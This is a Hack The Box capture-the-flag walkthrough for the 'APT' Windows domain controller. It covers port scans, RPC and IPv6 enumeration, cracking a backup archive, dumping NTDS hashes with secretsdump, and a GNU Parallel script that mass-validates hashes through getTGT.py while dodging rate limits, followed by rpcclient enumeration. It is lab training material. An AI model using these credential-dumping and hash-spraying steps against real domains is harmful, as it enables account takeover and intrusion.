This post documents the complete walkthrough of APT, a retired vulnerable VM created by cube0x0, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

APT is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.213 --rate=500

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-11-04 03:11:21 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.213
Discovered open port 135/tcp on 10.10.10.213

Hmm. This is a shit-show. Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -p80,135 -A --reason 10.10.10.213 -oN nmap.txt
...
PORT    STATE SERVICE REASON          VERSION
80/tcp  open  http    syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open  msrpc   syn-ack ttl 127 Microsoft Windows RPC

Wow. This doesn’t look good. Anyway, this is what the http service looks like.

This is a shit show.

Impacket’s rpcdump.py

Well, RPC is availalble. We can use Impacket’s rpcdump.py to dump the RPC services running on the machine like so.

python3 rpcdump.py '':''@10.10.10.213
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Retrieving endpoint list from 10.10.10.213
Protocol: [MS-RSP]: Remote Shutdown Protocol
Provider: wininit.exe
UUID    : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49664]
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\APT[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc06C750]

Protocol: N/A
Provider: winlogon.exe
UUID    : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0
Bindings:
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\APT[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc06C750]
          ncalrpc:[WMsgKRpc06DBE1]

Protocol: N/A
Provider: N/A
UUID    : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0
Bindings:
          ncalrpc:[csebpub]
          ncalrpc:[LRPC-32d08a7a25006c9ab9]
          ncalrpc:[LRPC-2e47ec8337f8d73192]
          ncacn_np:\\APT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-a9f28d933cdafd8836]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[LRPC-2e47ec8337f8d73192]
          ncacn_np:\\APT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-a9f28d933cdafd8836]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[LRPC-8e203c65260f07617f]
          ncalrpc:[dhcpcsvc]
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.10.213[49665]
          ncacn_np:\\APT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: N/A
Provider: N/A
UUID    : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0
Bindings:
          ncalrpc:[LRPC-32d08a7a25006c9ab9]
          ncalrpc:[LRPC-2e47ec8337f8d73192]
          ncacn_np:\\APT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-a9f28d933cdafd8836]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]

Protocol: N/A
Provider: sysntfy.dll
UUID    : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name
Bindings:
          ncalrpc:[LRPC-a9f28d933cdafd8836]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]
          ncalrpc:[IUserProfile2]
          ncalrpc:[LRPC-3da9aaffe7db740971]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: N/A
Provider: nsisvc.dll
UUID    : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint
Bindings:
          ncalrpc:[LRPC-9fa64a3c69f791b7ed]

Protocol: N/A
Provider: N/A
UUID    : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0
Bindings:
          ncalrpc:[LRPC-e13da139634e22ad78]
          ncalrpc:[LRPC-8e203c65260f07617f]
          ncalrpc:[dhcpcsvc]
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.10.213[49665]
          ncacn_np:\\APT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: N/A
Provider: dhcpcsvc.dll
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings:
          ncalrpc:[dhcpcsvc]
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.10.213[49665]
          ncacn_np:\\APT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: N/A
Provider: dhcpcsvc6.dll
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings:
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.10.213[49665]
          ncacn_np:\\APT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: [MS-EVEN6]: EventLog Remoting Protocol
Provider: wevtsvc.dll
UUID    : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings:
          ncacn_ip_tcp:10.10.10.213[49665]
          ncacn_np:\\APT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: N/A
Provider: nrpsrv.dll
UUID    : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings:
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: N/A
Provider: IKEEXT.DLL
UUID    : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API
Bindings:
          ncalrpc:[LRPC-ac53b3c8af4f316349]
          ncacn_ip_tcp:10.10.10.213[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: N/A
UUID    : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli
Bindings:
          ncalrpc:[LRPC-ac53b3c8af4f316349]
          ncacn_ip_tcp:10.10.10.213[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: N/A
UUID    : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli
Bindings:
          ncalrpc:[LRPC-ac53b3c8af4f316349]
          ncacn_ip_tcp:10.10.10.213[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: N/A
UUID    : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: schedsvc.dll
UUID    : 86D35949-83C9-4044-B424-DB363231FD0C v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID    : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0
Bindings:
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID    : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0
Bindings:
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: schedsvc.dll
UUID    : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0
Bindings:
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: gpsvc.dll
UUID    : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface
Bindings:
          ncalrpc:[LRPC-6c7d79b2be7a33160e]

Protocol: N/A
Provider: N/A
UUID    : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server
Bindings:
          ncalrpc:[LRPC-90cce070a31859619f]
          ncalrpc:[LRPC-007884fa2b991a56a3]
          ncalrpc:[LRPC-2c6ceae6197a1d5448]

Protocol: N/A
Provider: MPSSVC.dll
UUID    : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs
Bindings:
          ncalrpc:[LRPC-007884fa2b991a56a3]
          ncalrpc:[LRPC-2c6ceae6197a1d5448]

Protocol: N/A
Provider: N/A
UUID    : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs
Bindings:
          ncalrpc:[LRPC-007884fa2b991a56a3]
          ncalrpc:[LRPC-2c6ceae6197a1d5448]

Protocol: N/A
Provider: MPSSVC.dll
UUID    : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs
Bindings:
          ncalrpc:[LRPC-007884fa2b991a56a3]
          ncalrpc:[LRPC-2c6ceae6197a1d5448]

Protocol: N/A
Provider: BFE.DLL
UUID    : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API
Bindings:
          ncalrpc:[LRPC-2c6ceae6197a1d5448]

Protocol: N/A
Provider: N/A
UUID    : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service
Bindings:
          ncacn_np:\\APT[\PIPE\wkssvc]
          ncalrpc:[LRPC-0c574d6cbe9e5c6898]
          ncalrpc:[DNSResolver]

Protocol: N/A
Provider: N/A
UUID    : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface
Bindings:
          ncalrpc:[LRPC-0c574d6cbe9e5c6898]
          ncalrpc:[DNSResolver]

Protocol: N/A
Provider: N/A
UUID    : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server
Bindings:
          ncalrpc:[LRPC-0c574d6cbe9e5c6898]
          ncalrpc:[DNSResolver]

Protocol: [MS-NRPC]: Netlogon Remote Protocol
Provider: netlogon.dll
UUID    : 12345678-1234-ABCD-EF00-01234567CFFB v1.0
Bindings:
          ncalrpc:[NETLOGON_LRPC]
          ncacn_ip_tcp:10.10.10.213[49670]
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: [MS-RAA]: Remote Authorization API Protocol
Provider: N/A
UUID    : 0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7 v0.0 RemoteAccessCheck
Bindings:
          ncalrpc:[NETLOGON_LRPC]
          ncacn_ip_tcp:10.10.10.213[49670]
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]
          ncalrpc:[NETLOGON_LRPC]
          ncacn_ip_tcp:10.10.10.213[49670]
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: N/A
Provider: efssvc.dll
UUID    : 04EEB297-CBF4-466B-8A2A-BFD6A2F10BBA v1.0 EFSK RPC Interface
Bindings:
          ncacn_np:\\APT[\pipe\efsrpc]
          ncalrpc:[LRPC-8603e9d2516af20382]

Protocol: N/A
Provider: efssvc.dll
UUID    : DF1941C5-FE89-4E79-BF10-463657ACF44D v1.0 EFS RPC Interface
Bindings:
          ncacn_np:\\APT[\pipe\efsrpc]
          ncalrpc:[LRPC-8603e9d2516af20382]

Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote
Provider: lsasrv.dll
UUID    : 12345778-1234-ABCD-EF00-0123456789AB v0.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49670]
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol
Provider: samsrv.dll
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49670]
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol
Provider: ntdsai.dll
UUID    : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface
Bindings:
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: N/A
Provider: N/A
UUID    : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service
Bindings:
          ncalrpc:[LRPC-e8534655f126889ae9]

Protocol: N/A
Provider: srvsvc.dll
UUID    : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings:
          ncalrpc:[LRPC-e8534655f126889ae9]

Protocol: N/A
Provider: N/A
UUID    : E38F5360-8572-473E-B696-1B46873BEEAB v1.0
Bindings:
          ncalrpc:[LRPC-4054c90e503a13cdfc]

Protocol: N/A
Provider: N/A
UUID    : 4C9DBF19-D39E-4BB9-90EE-8F7179B20283 v1.0
Bindings:
          ncalrpc:[LRPC-4054c90e503a13cdfc]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49673]

Protocol: N/A
Provider: winlogon.exe
UUID    : 12E65DD8-887F-41EF-91BF-8D816C42C2E7 v1.0 Secure Desktop LRPC interface
Bindings:
          ncalrpc:[WMsgKRpc06DBE1]

Protocol: [MS-CMPO]: MSDTC Connection Manager:
Provider: msdtcprx.dll
UUID    : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0
Bindings:
          ncalrpc:[LRPC-d4cce6c99a9b6e742e]
          ncalrpc:[OLE37A39A6B0ABD8CD64BE6C24928B3]
          ncalrpc:[LRPC-1db486f3967af7cd6d]
          ncalrpc:[LRPC-1db486f3967af7cd6d]
          ncalrpc:[LRPC-1db486f3967af7cd6d]

Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management
Provider: dns.exe
UUID    : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49686]

Protocol: [MS-FRS2]: Distributed File System Replication Protocol
Provider: dfsrmig.exe
UUID    : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service
Bindings:
          ncacn_ip_tcp:10.10.10.213[52230]
          ncalrpc:[OLED73226644DDC7E67AA397986A093]

[*] Received 266 endpoints.

Looks like IPv6 is in use judging from 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint. Perhaps we can leak the IPv6 address with the IOXIDResolver interface as documented here?

Sweet. Let’s run nmap again, this time targeting the IPv6 addresses. We can choose any of the dead:beef addresses.

nmap -6 -n -v -Pn -p- -T5 -A --reason dead:beef::b885:d62a:d679:573f -oN nmap6.txt
...
PORT      STATE SERVICE      REASON         VERSION
53/tcp    open  domain       syn-ack ttl 63 Simple DNS Plus
80/tcp    open  http         syn-ack ttl 63 Microsoft IIS httpd 10.0
| http-server-header:
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
|_http-title: Bad Request
88/tcp    open  kerberos-sec syn-ack ttl 63 Microsoft Windows Kerberos (server time: 2020-11-27 07:08:21Z)
135/tcp   open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
389/tcp   open  ldap         syn-ack ttl 63 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Issuer: commonName=apt.htb.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-24T07:07:18
| Not valid after:  2050-09-24T07:17:18
| MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
|_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
|_ssl-date: 2020-11-27T07:09:27+00:00; 0s from scanner time.
445/tcp   open  microsoft-ds syn-ack ttl 63 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?    syn-ack ttl 63
593/tcp   open  ncacn_http   syn-ack ttl 63 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap     syn-ack ttl 63 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Issuer: commonName=apt.htb.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-24T07:07:18
| Not valid after:  2050-09-24T07:17:18
| MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
|_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
|_ssl-date: 2020-11-27T07:09:27+00:00; 0s from scanner time.
3268/tcp  open  ldap         syn-ack ttl 63 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Issuer: commonName=apt.htb.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-24T07:07:18
| Not valid after:  2050-09-24T07:17:18
| MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
|_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
|_ssl-date: 2020-11-27T07:09:27+00:00; 0s from scanner time.
3269/tcp  open  ssl/ldap     syn-ack ttl 63 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Issuer: commonName=apt.htb.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-24T07:07:18
| Not valid after:  2050-09-24T07:17:18
| MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
|_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
|_ssl-date: 2020-11-27T07:09:27+00:00; 0s from scanner time.
5985/tcp  open  http         syn-ack ttl 63 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
9389/tcp  open  mc-nmf       syn-ack ttl 63 .NET Message Framing
47001/tcp open  http         syn-ack ttl 63 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49664/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49669/tcp open  ncacn_http   syn-ack ttl 63 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49673/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49689/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
57767/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC

Now, this is a better representation of the remote machine. Looks like we have a Windows server. I’d better include the IPv6 addresses and map it to the domains in /etc/hosts.

/etc/hosts
dead:beef::b885:d62a:d679:573f  apt apt.htb apt.htb.local htb htb.local

SMB Enumeration

Let’s see what we can find with the good ol’ smbclient like so.

Now let’s see what’s inside backup.

Well well well, what have we here?

Really? Just as I expected, it’s not that simple. The file backup.zip is password-protected but nothing JtR can’t crack.

The password is iloveyousomuch.

Impacket’s secretsdump.py

Armed with SECURITY and , we can make use of Impacket’s secretsdump.py to dump out the NT hashes of the users in the Active Directory like so.

python3 secretsdump.py -security SECURITY -system SYSTEM -ntds ntds.dit LOCAL > dump

Long story short, there are 2,000 users in the Active Directory. We need to split them into usernames and NT hashes for credentials validation, for lack of a better term.

sed '24,2023!d' dump > ntlm
cut -d':' -f1 ntlm > usernames
cut -d':' -f4 ntlm > nthashes

With that, it’s just a matter of using CrackMapExec to validate the hashes, i.e. match the NTLM hash to the correct username. However, there’s a minor problem—CrackMapExec doesn’t do IPv6 and there seems to be a rate-limiting mechanism in place over at 445/tcp (SMB/CIFS) that prevents the scripting of rpcclient or the use of CrackMapExec for mass, automated validation.

Impacket’s getTGT.py

Well, we can still use Impacket’s getTGT.py for validation. In short, getTGT.py contacts the Key Distribution Center (KDC) over at 88/tcp to get the Ticket Granting Ticket (TGT) from the username and NT hash we provide as input. If the credentials are correct, a TGT is cached as a file. Otherwise, an invalid message is displayed. Perfect for scripting and overcoming the rate-limiting mechanism.

Combined with GNU Parallel, we’ll get a very efficient credentials validation tool.

validate.sh
#!/bin/bash

THREAD=$1

function die() {

    killall perl 2>/dev/null

}

export -f die

function check() {

    local user=$1
    local hash=$2
    local domain=htb.local
    local host=apt.htb.local

    local mesg=$(python3 getTGT.py ${domain}/${user}@${host} -hashes :${hash} 2>&1 | sed '$!d')

    if grep -Ev '(KDC_ERR|invalid)' <<<"$mesg"; then
        echo "[+] Username is $user, NT Hash is $hash"
        die
    else
        echo "$mesg"
    fi

}

export -f check

parallel -q -j$THREAD check ::: $2 :::: $3 2>/dev/null

We can also make use of another GNU Parallel instance to achieve some kind of divide-and-conquer strategy to optimize the mass validation.

time parallel -j10 ./validate.sh 4 :::: usernames ::: ./backup/nthashes_* 2>/dev/null | tee gotcha.txt

Not too shabby considering the sheer number of validations (~4M) performed.

Long story short, the valid username is henry.vinson and the valid NT hash is e53d87d42adaa3ca32bdb34a876cbffb. Before we proceed further, we should point KRB5CCNAME to [email protected] to reuse the ticket for other Impacket’s tools.

Enumeration with rpcclient

Armed with valid credentials, we can finally enumerate the Active Directory with rpcclient. I’m particular interested in the following information:

  1. Other domain users
  2. Domain password policy
  3. Members of the builtin group Remote Management Users

The resulting information will help us determine our next steps.

Domain Users

rpcclient -Uhenry.vinson%e53d87d42adaa3ca32bdb34a876cbffb --pw-nt-hash -c enumdomusers apt.htb.local
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[henry.vinson] rid:[0x451]
user:[henry.vinson_adm] rid:[0x452]

Looks like henry.vinson had another, more privileged account!

Domain password policy

rpcclient -Uhenry.vinson%e53d87d42adaa3ca32bdb34a876cbffb --pw-nt-hash -c "getusrdompwinfo 0x452" apt.htb.local
    &info: struct samr_PwInfo
        min_password_length      : 0x0005 (5)
        password_properties      : 0x00000000 (0)
               0: DOMAIN_PASSWORD_COMPLEX
               0: DOMAIN_PASSWORD_NO_ANON_CHANGE
               0: DOMAIN_PASSWORD_NO_CLEAR_CHANGE
               0: DOMAIN_PASSWORD_LOCKOUT_ADMINS
               0: DOMAIN_PASSWORD_STORE_CLEARTEXT
               0: DOMAIN_REFUSE_PASSWORD_CHANGE

I’ve a bad feeling about this although there’s no complex password policy in place.

Remote Management Users

rpcclient -Uhenry.vinson%e53d87d42adaa3ca32bdb34a876cbffb --pw-nt-hash -c "enumalsgroups builtin" apt.htb.local
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
